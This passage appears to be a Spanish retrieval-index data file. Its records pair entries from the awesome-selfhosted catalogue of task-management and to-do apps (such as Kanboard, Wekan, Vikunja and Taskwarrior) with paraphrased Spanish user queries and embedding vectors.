-0.00436, -0.08081, 0.0574, -0.05159, 0.00444, -0.08945, -0.0136, -0.01032, -0.03841, 0.02146, 0.02123, 0.0259, 0.05897, 0.02373, -0.00956, 0.05486, 0.0126, 0.04384, -0.07371, -0.04978, -0.02936, -0.10249, 0.05425, 0.06793, 0.06192, -0.06013, -0.07064, -0.11448, 0.00817, -0.00445, 0.02828, -0.01301, 0.03058, -0.00602, 0.00866, 0.06795, -0.08362, 0.01853, 0.00396, 0.02144, 0.07055, 0.07775, 0.01229, 0.07606, -0.07549, -0.04156, -0.10902, -0.00251, 0.03435, -0.04382, 0.00407, -0.02099, 0.07594, -0.02494, 0.06293, -0.08922, -0.04925, -0.0178, 0.04803, -0.00422, -0.06253, 0.04623, -0.0444, 0.05548, -0.01292, -0.02347, -0.01769, 0.04511, -0.03687, -0.04937, -0.06072, 0.03245, -0.02473, 0.08664, 0.0256, 0.03911, 0.12239, -0.02882, 0.08767, 0.02501, 0.08878, 0.01703, 0.00958, 0.08574, -0.04433, -0.07326, -0.02722, 0.00655, -0.00142, 0.0076, -0.0092, 0.00418, 0.06521, 0.00188, -0.03144, -0.06495, -0.00027, 0.06757, 0.00791, 0.04619, 0.02285, -0.08148, 0.01606, -0.00815, 0.00202, -0.02625, 0.03296, 0.02901, -0.00265, 0.00084, -0.02416, -0.01021, 0.06348, 0.00162, -0.00729, -0.04022, -0.01554, -0.03822, -0.03256, -0.03792, -0.07325, 0.03698, 0.0569, 0.07438, 0.02113, 0.04038, -0.02427]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: HamsterBase Tasks β€” A tool to help organize ideas and build great things. Plan, organize, build and ship [AGPL-3.0, Docker]. Kan β€” Flexible kanban app that helps you organise work, track progress, and deliver results (alternative to Trello) [AGPL-3.0, Docker]. Kanboard β€” Simple visual task board [MIT, PHP]. Listaway β€” List management app for creating and publicly sharing lists of items. Supports auth, admin tools, item notes and priorities, and opt-in public read-only links with randomized URLs (alternative to Amazon Lists) [MIT, Docker]. myTinyTodo β€” Simple way to manage your todo list in AJAX style. Uses PHP, jQuery, SQLite/MySQL. GTD compliant [GPL-2.0, PHP]. Nullboard β€” Single-page minimalist kanban board; compact, highly readable and quick to use [BSD-2-Clause, Javascript]. OpenHabitTracker β€” Track habits, tasks and notes with time tracking, calendar view and completion statistics [GPL-3.0, Docker].", "indexar": "que programa sirve para organizar tareas y construir proyectos de forma sencilla", "v": [-0.00507, 0.11848, -0.22673, -0.21521, 0.08853, -0.12441, 0.05677, 0.0138, -0.04858, -0.07776, -0.12597, -0.02071, 0.11273, -0.09135, 0.08455, 0.03028, 0.1698, -0.12354, -0.00546, 0.05613, -0.08726, 0.04898, 0.02271, 0.04625, -0.02904, -0.05323, 0.08228, -0.09132, -0.07237, 0.10365, 0.03976, 0.05894, 0.13897, -0.10324, 0.07195, -0.00895, -0.01623, 0.00695, -0.0933, -0.00285, -0.12047, 0.09502, -0.05605, 0.09909, 0.00603, 0.02317, 0.1264, -0.0939, -0.03305, 0.01317, -0.0019, 0.00919, -0.02946, 0.01536, 0.03177, -0.05453, -0.03506, -0.22243, -0.12852, -0.00963, -0.06523, 0.04517, 0.01835, -0.05524, 0.14314, 0.04293, -0.03532, 0.05523, -0.02919, -0.01927, 0.01033, -0.00884, 0.00468, -0.07693, -0.01272, 0.03797, -0.03436, -0.04906, -0.0645, -0.05008, -0.00975, 0.00561, -0.09008, 0.03251, -0.01561, -0.05266, -0.07665, 0.00808, 0.00798, -0.03908, -0.04449, 0.05791, 0.00956, 0.03769, 0.00396, -0.02542, 0.14393, 0.10924, 0.09798, 0.05535, -0.07211, -0.15791, -0.01807, 0.08228, -0.10083, 0.10802, 0.0576, 0.07478, -0.01003, -0.01646, -0.03851, 0.01767, -0.03268, -0.05223, -0.08035, -0.04829, -0.01874, 0.02935, 0.03694, -0.05171, 0.00462, 0.04091, -0.01376, 0.07926, 0.0379, -0.09654, 0.04977, 0.09554, 0.03838, 0.04214, 0.03569, 0.05296, -0.05604, 0.0455, -0.09482, -0.05698, 0.02983, -0.08538, -0.01559, -0.08697, -0.008, 0.10082, -0.0355, -0.09664, -0.02223, 0.04768, 0.08499, -0.02794, 0.02978, 0.0319, 0.07758, -0.00932, -0.00457, 0.02578, -0.07005, -0.04872, -0.01358, 0.01345, -0.02968, 0.08849, -0.05517, 0.04024, 0.00631, -0.02336, 0.04965, -0.10637, -0.00361, 0.0605, 0.07768, 0.06087, -0.01195, 0.02322, 0.0555, -0.10254, -0.00655, -0.05948, -0.01326, -0.06906, 0.06006, -0.02549, -0.06879, 0.05025, -0.00175, 0.07284, 0.00217, -0.0749, -0.02269, 0.01282, -0.00076, 0.00395, -0.013, -0.00966, -0.01262, -0.03605, 0.02501, -0.00886, -0.02923, -0.02994, 0.04256, -0.01038, -0.01473, -0.09317, 0.0392, 0.04467, -0.02357, 0.08924, -0.04091, 0.03204, 0.05382, 0.1322, 0.07922, -0.0456, 0.03184, 0.00609, -0.01655, 0.01445, -0.02003, -0.00278, 0.04438, 0.05259, -0.03648, -0.03833, -0.00463, -0.027, 0.06153, -0.04205, 0.05785, 0.04036, 0.02459, 0.02222, 0.00366, -0.03766, 0.00853, 0.00091, 0.03347, -0.04419, -0.02567, 0.01048, -0.01185, -0.013, 0.02128, 0.03904, -0.01172, -0.02305, -0.05072, 0.00485, -0.00751, 0.02767, -0.0421, -0.02148, -0.07474, 0.05587, 0.04971, -0.00506, 0.0056, 0.00385]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: HamsterBase Tasks β€” A tool to help organize ideas and build great things. Plan, organize, build and ship [AGPL-3.0, Docker]. Kan β€” Flexible kanban app that helps you organise work, track progress, and deliver results (alternative to Trello) [AGPL-3.0, Docker]. Kanboard β€” Simple visual task board [MIT, PHP]. Listaway β€” List management app for creating and publicly sharing lists of items. Supports auth, admin tools, item notes and priorities, and opt-in public read-only links with randomized URLs (alternative to Amazon Lists) [MIT, Docker]. myTinyTodo β€” Simple way to manage your todo list in AJAX style. Uses PHP, jQuery, SQLite/MySQL. GTD compliant [GPL-2.0, PHP]. Nullboard β€” Single-page minimalist kanban board; compact, highly readable and quick to use [BSD-2-Clause, Javascript]. OpenHabitTracker β€” Track habits, tasks and notes with time tracking, calendar view and completion statistics [GPL-3.0, Docker].", "indexar": "con quΓ© puedo montar un tablero visual tipo Kanban alternativo a Trello", "v": [0.04851, 0.02686, -0.25124, 0.06862, -0.15136, 0.06449, 0.01549, 0.01688, -0.06285, -0.07536, 0.06499, -0.21948, 0.05203, 0.07297, 0.19004, 0.19868, 0.00206, -0.15628, 0.19719, -0.04318, 0.02095, -0.09291, -0.10291, -0.03589, 0.01541, -0.00751, -0.08823, -0.07099, -0.05871, 0.08248, 0.05351, 0.09545, 0.09547, 0.0151, -0.03518, -0.05854, 0.0785, 0.05467, -0.03236, -0.01412, 0.00722, -0.09175, -0.05418, 0.02986, -0.06998, -0.06711, 0.01679, 0.01746, -0.10564, 0.1941, 0.07296, 0.00642, -0.03792, -0.00129, 0.04943, -0.08453, 0.14985, -0.02072, 0.05519, 0.02352, -0.00585, 0.09415, 0.05578, -0.0467, 0.03714, 0.07357, -0.08463, 0.0862, -0.09977, -0.03918, -0.09298, -0.02882, 0.08569, -0.01706, -0.04386, 0.07259, -0.02234, -0.00592, 0.07025, 0.01035, -0.0324, -0.04826, 0.02392, 0.14177, -0.17253, -0.00572, 0.04255, -0.06155, -0.03495, 0.06074, 0.07524, 0.06847, 0.13559, -0.01214, -0.07997, 0.01929, -0.06071, 0.11739, -0.04892, 0.04693, -0.04689, 0.02997, -0.12678, 0.11827, 0.02359, -0.03414, 0.00438, 0.03737, -0.00684, -0.00813, -0.00253, 0.05758, -0.0607, -0.02514, 0.00213, -0.04902, -0.02194, 0.04971, 0.00643, -0.04289, -0.00333, 0.06933, 0.08249, -0.02086, 0.04978, -0.02098, 0.09369, 0.13134, -0.07301, 0.04679, -0.01714, 0.00217, -0.05962, -0.01995, -0.06661, 0.0474, 0.03924, -0.03098, 0.06553, 0.02641, 0.04261, 0.01087, 0.01216, -0.08322, -0.04934, -0.00916, 0.05307, 0.04494, -0.08261, 0.07346, -0.00058, 0.06722, 0.02795, 0.02366, -0.06169, -0.01946, 0.04604, 0.00166, 0.00132, 0.09459, 3e-05, -0.00092, 0.02678, 0.07494, -0.05873, 0.00473, -0.10674, -0.02036, -0.00678, -0.02898, -0.05136, -0.01997, -0.04958, 0.00143, 0.02186, -0.03497, -0.04394, -0.02932, -0.01618, 0.04279, -0.03134, 0.03134, -0.02783, 0.02674, 0.02402, -0.02124, 0.03485, -0.02944, 0.03451, 0.01174, -0.01846, 0.03289, -0.00132, -0.03109, 0.01885, -0.04344, 0.0603, -0.04954, 0.00521, -0.02136, -0.03009, -0.00183, -0.00013, -0.05287, 0.01001, -0.02828, -0.01928, 0.11342, -0.01439, 0.03704, 0.06207, -0.01333, 0.05154, -0.02002, 0.03986, -0.0087, 0.01519, -0.06135, -0.04061, 0.03497, 0.02814, -0.01693, 0.0418, 0.0169, -0.02015, 0.01739, -0.00611, 0.01985, -0.037, 0.0466, -0.00281, -0.0021, 0.03215, 0.01719, -0.01059, 0.02443, 0.01662, -0.03271, 0.00928, -0.03625, 0.04288, 0.06126, 0.01514, 0.0015, 0.03567, -0.03641, -0.07868, 0.05126, 0.00645, -0.08688, -0.0133, 0.01649, 0.00994, -0.04256, 0.00062, 0.02331]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: HamsterBase Tasks β€” A tool to help organize ideas and build great things. Plan, organize, build and ship [AGPL-3.0, Docker]. Kan β€” Flexible kanban app that helps you organise work, track progress, and deliver results (alternative to Trello) [AGPL-3.0, Docker]. Kanboard β€” Simple visual task board [MIT, PHP]. Listaway β€” List management app for creating and publicly sharing lists of items. Supports auth, admin tools, item notes and priorities, and opt-in public read-only links with randomized URLs (alternative to Amazon Lists) [MIT, Docker]. myTinyTodo β€” Simple way to manage your todo list in AJAX style. Uses PHP, jQuery, SQLite/MySQL. GTD compliant [GPL-2.0, PHP]. Nullboard β€” Single-page minimalist kanban board; compact, highly readable and quick to use [BSD-2-Clause, Javascript]. OpenHabitTracker β€” Track habits, tasks and notes with time tracking, calendar view and completion statistics [GPL-3.0, Docker].", "indexar": "que herramienta libre me ayuda a crear listas de items y compartirlas pΓΊblicamente", "v": [0.08226, 0.23545, -0.13318, -0.17359, -0.02041, -0.16725, -0.11723, 0.02694, -0.10749, -0.14279, -0.12684, -0.17887, 0.03764, -0.06609, 0.09233, -0.0199, 0.07649, -0.08056, 0.05616, 0.00715, 0.012, 0.06132, -0.17706, -0.08367, -0.08848, -0.13216, 0.10555, -0.08443, -0.13822, 0.15708, -0.01095, -0.0107, -0.10954, -0.0229, 0.02974, -0.05243, 0.0855, 0.00141, -0.04417, 0.00973, -0.05499, 0.06207, -0.00716, 0.08121, -0.06028, -0.04304, -0.04349, 0.06321, -0.01784, 0.10506, -0.0408, -0.15176, -0.14515, -0.04206, -0.00295, -0.13097, 0.14897, -0.16159, -0.07711, -0.06475, -0.18819, 0.0042, -0.03964, -0.03956, -0.03407, 0.02905, -0.00363, -0.05555, -0.0967, 0.15036, -0.00118, -0.04164, 0.07923, -0.03873, -0.03553, -0.0172, -0.04373, -0.01256, -0.04927, 0.01301, 0.0722, -0.05119, 0.06177, 0.05629, 0.04135, -0.09781, 0.07684, -0.01075, 0.03686, -0.01959, 0.00779, 0.01299, -0.077, -0.00947, 0.0409, 0.0226, 0.02259, 0.06067, -0.01155, 0.01033, 0.07886, -0.07232, -0.06664, -0.06507, -0.00061, -0.01389, -0.02626, 0.01592, -0.12787, 0.03768, 0.07416, -0.00118, 0.036, -0.01187, -0.02259, 0.01737, -0.05475, 0.03894, -0.01321, -0.01658, 0.06711, -0.00155, -0.03975, -0.04784, 0.04614, 0.02317, -0.02164, 0.09146, -0.05931, -0.00772, 0.01807, 0.02859, -0.05786, -0.07025, -0.00979, -0.06768, -0.02222, -0.06672, -0.00137, -0.04939, -0.00159, 0.00362, -0.04522, -0.07597, -0.03355, -0.04499, 0.01065, -0.05, -0.0093, 0.03503, 0.02345, -0.01062, 0.03492, 0.00497, -0.02111, -0.00673, -0.0159, 0.02691, -0.05682, -0.022, -0.04464, 0.0443, 0.01091, -0.02817, 0.02268, 0.0044, 0.03648, 0.04018, 0.04571, 0.03343, 0.01655, 0.03642, 0.08915, -0.04392, 0.01511, -0.07607, -0.00886, -0.02541, -0.03966, -0.04829, -0.034, -0.01987, -0.04982, -0.0144, -0.00391, -0.07621, 0.03105, -0.01967, 0.00303, 0.06684, -0.0612, 0.01072, 0.01913, -0.03889, 0.0497, -0.00845, 0.02733, -0.06114, 0.04773, -0.02584, -0.06225, -0.05637, -0.00385, -0.04071, -0.04397, 0.02861, -0.06085, -0.00241, 0.02595, 0.00264, 0.08886, 0.01835, 0.03932, -0.04903, -0.03595, -0.00159, -0.01371, -0.00716, -0.02346, -0.07277, 0.05375, 0.03631, 0.0283, -0.02542, 0.03825, 0.05322, 0.03387, 0.05494, 0.01912, -0.00599, 0.02196, -0.05907, 0.02705, -0.05249, 0.03458, -0.05206, 0.02146, -0.0112, -0.00188, 0.04848, 0.02918, 0.07707, 0.02329, -0.04684, -0.02157, -0.0418, -0.00214, -0.02302, -0.04649, -0.09745, -0.04694, 0.00204, 0.06529, -0.06584, -0.00321, -0.03175]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: Our Shopping List β€” Simple shared list application including shopping lists and any other small todo-list that needs to be used collaboratively [AGPL-3.0, Docker]. Super Productivity β€” Advanced todo list app with integrated timeboxing and time tracking capabilities. Integrates with Jira, GitHub, GitLab, Redmine and OpenProject [MIT, Docker]. Task Keeper β€” List editor for power users, backed by a self-hosted server [Apache-2.0, Scala]. Tasks.md β€” A self-hosted, file based task management board that supports Markdown syntax [MIT, Docker]. Taskwarrior β€” Taskwarrior is Free and Open Source Software that manages your TODO list from your command line. It is flexible, fast, efficient, and unobtrusive. It does its job then gets out of your way [MIT, C++]. Tracks β€” Web-based application to help you implement David Allen’s [Getting Things Doneβ„’](https://en.wikipedia.org/wiki/Getting_Things_Done) methodology [GPL-2.0, Ruby].", "indexar": "cual programa puedo usar para hacer una lista de compras compartida con mis amigos?", "v": [-0.00911, 0.16543, -0.14205, -0.0581, -0.0513, -0.1337, 0.01847, -0.02183, -0.18964, -0.24051, -0.05768, -0.07603, -0.05016, -0.02581, -0.05783, -0.05696, 0.12169, 0.06183, 0.14717, 0.01899, 0.06537, 0.0215, -0.11595, -0.07457, -0.09088, 0.00457, 0.09503, -0.02965, -0.15284, 0.06912, 0.04385, -0.05352, 0.03566, -0.09301, -0.00579, -0.04785, 0.1286, 0.02158, 0.08189, 0.00666, 0.03407, 0.0878, -0.09853, -0.07385, 0.07689, 0.01269, -0.0511, 0.02327, -0.06037, -0.00417, -0.01649, 0.03725, -0.1343, -0.0193, 0.06931, -0.0973, 0.0717, -0.1167, -0.06587, 0.041, -0.04624, -0.08835, 0.00918, 0.03248, -0.00447, -0.02191, 0.00125, 0.02865, -0.1009, 0.07228, 0.01442, 0.07527, -0.01676, -0.06979, -0.01541, 0.06511, -0.02105, -0.04761, 0.02342, 0.00746, 0.0161, -0.06876, 0.03343, 0.03133, 0.00603, -0.1394, 0.07943, -0.01367, 0.00781, -0.01229, 0.01541, 0.04563, -0.04364, -0.00155, 0.09816, -0.05962, 0.08786, 0.08883, -0.01908, 0.05524, 0.14296, -0.05893, -0.04894, 0.09835, -0.0853, 0.0459, -0.00085, -0.00202, -0.03725, -0.00385, 0.01604, 0.0069, -0.14353, -0.04627, -0.03792, 0.01214, -0.08314, -0.03193, 0.0469, -0.04493, -0.10155, 0.08438, -0.07077, -0.02609, 0.14494, 0.043, 0.00805, 0.17417, -0.06257, 0.05419, -0.04452, 0.08057, 0.0111, -0.0989, -0.084, -0.13503, -0.02792, -0.02671, 0.01096, -0.09489, 0.07628, 0.02163, -0.02364, 0.00352, 0.00551, 0.02057, 0.03342, -0.03683, -0.02277, 0.01756, 0.08842, 0.06589, 0.00948, 0.02502, -0.02746, -0.00244, 0.10561, -0.05986, -0.00595, -0.00707, -0.03627, 0.03888, 0.02623, -0.00432, 0.08737, -0.08556, 0.01427, 0.04628, -0.00245, 0.05501, 0.03503, 0.07011, -0.01054, -0.04687, 0.02576, -0.05469, -0.03087, -0.06226, 0.01388, -0.00415, -0.05266, 0.05476, 0.01591, 0.02135, 0.00135, -0.05038, -0.04201, 0.03452, -0.00441, 0.00551, -0.05226, -0.01214, 0.02974, 0.02721, 0.04334, -0.07127, 0.02278, -0.0046, 0.06255, -0.08298, -0.03615, -0.03103, 0.01228, -0.04409, 0.05039, 0.023, -0.09827, 0.03038, 0.09389, 0.08517, -0.00315, -0.07197, 0.06385, 0.00868, -0.06027, -0.02545, -0.01319, -0.00104, 0.03165, 0.02205, -0.01356, 0.01345, 0.04021, 0.0458, 0.04584, -0.00234, 0.01797, 0.0269, 0.00368, 0.03595, -0.0368, -0.01463, 0.03578, -0.0743, 0.06137, -0.02911, -0.04352, -0.01513, -0.0293, -0.04597, -0.02889, 0.08074, 0.00531, -0.05418, -0.06082, 0.0343, -0.06455, 0.0324, -0.03358, -0.06987, -0.01051, -0.02037, 0.0576, -0.07729, 0.03172, 0.04379]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: Our Shopping List β€” Simple shared list application including shopping lists and any other small todo-list that needs to be used collaboratively [AGPL-3.0, Docker]. Super Productivity β€” Advanced todo list app with integrated timeboxing and time tracking capabilities. Integrates with Jira, GitHub, GitLab, Redmine and OpenProject [MIT, Docker]. Task Keeper β€” List editor for power users, backed by a self-hosted server [Apache-2.0, Scala]. Tasks.md β€” A self-hosted, file based task management board that supports Markdown syntax [MIT, Docker]. Taskwarrior β€” Taskwarrior is Free and Open Source Software that manages your TODO list from your command line. It is flexible, fast, efficient, and unobtrusive. It does its job then gets out of your way [MIT, C++]. Tracks β€” Web-based application to help you implement David Allen’s [Getting Things Doneβ„’](https://en.wikipedia.org/wiki/Getting_Things_Done) methodology [GPL-2.0, Ruby].", "indexar": "necesito una aplicaciΓ³n web para organizar tareas con integraciΓ³n a Jira y GitHub, quΓ© me recomiendas?", "v": [-0.06514, 0.25936, -0.19775, -0.15716, 0.20986, -0.1444, -0.1116, 0.07966, -0.07249, 0.01911, -0.05829, -0.06897, 0.01279, 0.03381, 0.1033, -0.02368, 0.13298, -0.09417, -0.01164, 0.02352, -0.13481, 0.08198, -0.01452, -0.0189, -0.20286, -0.03218, 0.05262, -0.04059, -0.08577, 0.03331, 0.01676, -0.12134, -0.02393, -0.10797, -0.12736, 0.05206, -0.03202, 0.01042, -0.06701, -0.0331, -0.08193, 0.12632, -0.14271, 0.05357, 0.00695, 0.03506, 0.14207, -0.06267, -0.10961, 0.00252, -0.07723, 0.02831, 0.01257, 0.03581, -0.03072, -0.06033, 0.00741, -0.09674, -0.05023, -0.05131, -0.11183, 0.04244, -0.05791, 0.04617, 0.04934, 0.00053, -0.03897, 0.13354, -0.06236, 0.0719, -0.08511, 0.03875, -0.04884, -0.04508, 0.02483, -0.04488, 0.00979, 0.04165, 0.0198, 0.06537, 0.06856, 0.03165, -0.03189, 0.07729, -0.06249, -0.10799, 0.03497, 0.00771, 0.10944, -0.04788, 0.01577, -0.0481, -0.07269, 0.00526, -0.05115, -0.09206, 0.07029, 0.08069, 0.08552, 0.02211, -0.02168, -0.10754, -0.03521, 0.07465, -0.08247, 0.04511, 0.06503, 0.04108, -0.05074, -0.04903, 0.06884, -0.02311, 0.04576, 0.03846, 0.03674, -0.038, -0.03876, -0.04118, 0.01455, -0.04215, -0.03106, 0.03967, -0.01723, -0.01192, 0.01791, -0.01886, 0.0596, 0.11606, 0.03173, 0.01131, -0.00508, -0.08476, -0.06565, 0.04224, -0.025, 0.04615, 0.02451, -0.1016, -0.0249, -0.07681, -0.00476, 0.00591, -0.01189, -0.00232, 0.12367, 0.11412, 0.04594, 0.00018, -0.00353, 0.05179, -0.00604, -0.02202, -0.03777, -0.00856, -0.03034, -0.03664, -0.03075, -0.02683, -0.02077, -0.04697, 0.01065, 0.02764, -0.01783, 0.06943, -0.00482, -0.03844, 0.07253, 0.0376, -0.0166, 0.06362, 0.01654, 0.09193, -0.00494, -0.11928, 0.01868, -0.03629, -0.01201, 0.01193, 0.04037, -0.03287, -0.00218, 0.01518, 0.01625, 0.03081, 0.00471, -0.08136, 0.00861, -0.05325, -0.0472, 0.05694, -0.00683, 0.01843, 0.00744, -0.07075, 0.06746, -0.01552, -0.10649, -0.06748, -0.03731, 0.03244, -0.04367, -0.04282, -0.03195, -0.02879, -0.03145, 0.03703, -0.06028, 0.06623, -0.02872, 0.05824, 0.05099, -0.07737, -0.01413, -0.00296, 0.0067, -0.03158, -0.0111, -0.00288, -0.02366, 0.03457, -0.01849, -0.02068, -0.01674, -0.06175, 0.03546, 0.01495, 0.06077, 0.00208, 0.00145, 0.03723, 0.01339, -0.00164, -0.03879, -0.04812, 0.02931, 0.00095, -0.02935, -0.01044, -0.03214, 0.0164, -0.03506, 0.04375, 0.02639, 0.01445, -0.05838, -0.00582, -0.02137, 0.06399, -0.04114, -0.07355, -0.05687, 0.04428, 0.09224, -0.0317, 0.01241, -0.00856]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: Our Shopping List β€” Simple shared list application including shopping lists and any other small todo-list that needs to be used collaboratively [AGPL-3.0, Docker]. Super Productivity β€” Advanced todo list app with integrated timeboxing and time tracking capabilities. Integrates with Jira, GitHub, GitLab, Redmine and OpenProject [MIT, Docker]. Task Keeper β€” List editor for power users, backed by a self-hosted server [Apache-2.0, Scala]. Tasks.md β€” A self-hosted, file based task management board that supports Markdown syntax [MIT, Docker]. Taskwarrior β€” Taskwarrior is Free and Open Source Software that manages your TODO list from your command line. It is flexible, fast, efficient, and unobtrusive. It does its job then gets out of your way [MIT, C++]. Tracks β€” Web-based application to help you implement David Allen’s [Getting Things Doneβ„’](https://en.wikipedia.org/wiki/Getting_Things_Done) methodology [GPL-2.0, Ruby].", "indexar": "busco un gestor de tareas desde terminal que sea rΓ‘pido y no moleste en mi uso diario", "v": [-0.12529, -0.03171, -0.23239, -0.15557, -0.08935, 0.04522, -0.13069, 0.04577, -0.05793, -0.00494, -0.1857, 0.09047, 0.05807, 0.04698, 0.08957, -0.10455, 0.06061, -0.00153, 0.13483, -0.0479, 0.00954, -0.00819, 0.08749, 0.09417, -0.01077, 0.01861, -0.05464, -0.23428, -0.08592, -0.03782, -0.00582, -0.14681, 0.10042, -0.18208, -0.01984, -0.04495, -0.03027, -0.03208, -0.00013, 0.07437, 0.06741, -0.02548, -0.16363, 0.0029, 0.15192, -0.0849, 0.06592, -0.15179, -0.01036, 0.03526, 0.00036, -0.09758, 0.02304, 0.07446, -0.0539, 0.05813, 0.12564, -0.07315, 0.10567, -0.06147, -0.12336, 0.00227, 0.01131, 0.05757, 0.02562, 0.01906, 0.05021, 0.03884, -0.11111, 0.07322, 0.02944, 0.07598, 0.11679, 0.08771, 0.04256, 0.02393, -0.05318, 0.06396, 0.09329, 0.00574, 0.03297, 0.00128, -0.07449, 0.03351, -0.08553, -0.09356, 0.01912, -0.00953, -0.00866, 0.02257, 0.06746, -0.01479, -0.04429, 0.03138, -0.05354, -0.01139, -0.02113, 0.04153, -0.00362, -0.01547, 0.09493, 0.01163, -0.02946, 0.06429, -0.00016, 0.0281, -0.06213, 0.02891, 0.01232, -0.06098, -0.02669, -0.03068, 0.10679, -0.05717, -0.02995, 0.02563, -0.01428, -0.08008, -0.01882, -0.06521, 0.00975, -0.06254, 0.08231, 0.08098, 0.1629, -0.07421, 0.10702, 0.03246, 0.13302, 0.04251, 0.03971, -0.02765, 0.00643, 0.01705, -0.05903, 0.03422, -0.00693, -0.10322, 0.0003, -0.05171, -0.06598, 0.09366, 0.01265, 0.03201, 0.05034, 0.0655, -0.00661, -0.04139, -0.07858, -0.01277, 0.03769, -0.10683, -0.01548, 0.01918, -0.02284, -0.02958, 0.07981, -0.03258, -0.10624, 0.01942, -0.02172, -0.06455, -0.02331, 0.06172, -0.01444, -0.06697, -0.02635, -0.01018, 0.00363, 0.05566, -0.01427, 0.03438, 0.03013, -0.05218, 0.05117, -0.00663, 0.05546, 0.04041, 0.02022, 0.02784, -0.02727, 0.05654, 0.01349, 0.03142, -0.06322, -0.0828, -0.02317, 0.04812, 0.00611, 0.0847, 0.06276, 0.05288, 0.0263, -0.01168, 0.03644, 0.01849, -0.01489, -0.02171, -0.01584, -0.01167, 0.02918, -0.05045, 0.00837, 0.01626, -0.02076, 0.00436, -0.04419, -0.0197, 0.01516, 0.02188, 0.02188, 0.08768, 0.045, 0.01295, 0.01799, -0.04504, 0.01547, -0.03987, 0.0307, 0.02681, 0.01361, -0.02095, 0.02967, -0.00554, 0.00014, -0.004, 0.0372, 0.01548, 0.02092, 0.04076, -0.03496, 0.01251, 0.01198, -0.06715, 0.01865, -0.03512, 0.02453, -0.01554, -0.00907, -0.03864, 0.03081, 0.05012, 0.01612, 0.01227, -0.08311, 0.01908, -0.03951, 0.01473, -0.05214, 0.01889, -0.05408, -0.04159, 0.05302, -0.02093, -0.0009, -0.01431]} -{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: tududi β€” Task management tool with hierarchical structure, smart recurring tasks, and seamless Telegram integration [MIT, Docker]. Vikunja β€” The to-do app to organize your life [AGPL-3.0/GPL-3.0, Go]. Wekan β€” Open-source Trello-like kanban [MIT, Nodejs]. Will Be Done β€” Offline-first task manager with weekly planning, project boards, real-time sync, Vim keybindings, desktop quick add, and import from popular task managers (alternative to TickTick, Todoist) [AGPL-3.0, Docker/Nodejs].", "indexar": "ΒΏcon quΓ© programa puedo organizar mis tareas y mi vida personal de forma centralizada?", "v": [-0.14382, 0.20429, -0.03664, -0.06281, 0.06073, -0.07681, -0.00852, 0.00978, -0.16879, -0.13297, -0.08176, -0.04929, 0.06502, -0.02352, 0.08108, 0.02187, 0.22019, -0.01339, 0.07528, 0.00449, -0.10195, -0.04528, -0.01898, 0.03549, -0.04823, -0.06175, 0.14152, -0.10927, -0.06902, 0.00946, 0.01526, 0.01874, 0.12705, -0.08047, 0.08721, 0.07567, -0.03832, 0.08312, -0.09218, -0.0532, -0.10509, 0.08049, 0.02218, 0.11003, 0.16365, 0.04142, 0.10943, -0.0443, -0.09816, 0.00184, -0.08024, -0.02327, 0.04992, -0.06436, -0.00494, -0.15202, -0.11242, -0.05393, 0.00364, 0.02343, -0.05829, 0.09822, 0.06051, 0.05632, 0.07864, 0.03538, -0.01579, -0.06837, -0.05236, 0.12443, -0.03014, -0.02442, 0.00014, -0.03622, 0.00034, -0.00548, 0.01131, -0.00771, 0.02819, -0.00139, -0.01916, 0.09606, -0.05263, 0.10472, -0.0133, -0.03739, 0.00376, 0.02725, 0.02518, -0.09273, -0.00522, 0.02299, 0.01143, 0.08021, -0.01474, 0.00744, 0.08933, 0.02485, 0.02599, 0.03254, 0.05924, -0.09233, -0.04794, 0.07758, -0.13747, 0.03602, 0.05003, 0.02487, -0.05373, -0.0563, -0.10135, 0.00828, -0.03872, -0.02412, -0.07739, 0.02547, -0.08145, 0.07307, 0.05335, -0.06891, -0.0382, 0.06335, 0.07653, 0.03932, 0.1365, 0.01353, 0.03425, 0.11346, 0.02203, 0.10843, 0.05193, 0.04509, -0.00247, -0.0655, 0.02986, -0.09626, -0.00402, -0.07185, 0.08469, -0.09757, 0.01146, 0.03862, -0.04336, -0.04677, 0.0557, -0.01087, -0.00126, -0.05802, -0.04015, 0.02295, 0.00703, 0.02941, 0.08123, 0.00899, 0.01815, -0.04939, -0.00827, -0.04443, 0.03011, -0.02862, -0.07365, 0.03019, -0.03406, -0.05748, 0.055, -0.05091, 0.06849, 0.02028, 0.0104, 0.09388, -0.0756, -0.00921, 0.04642, -0.11856, 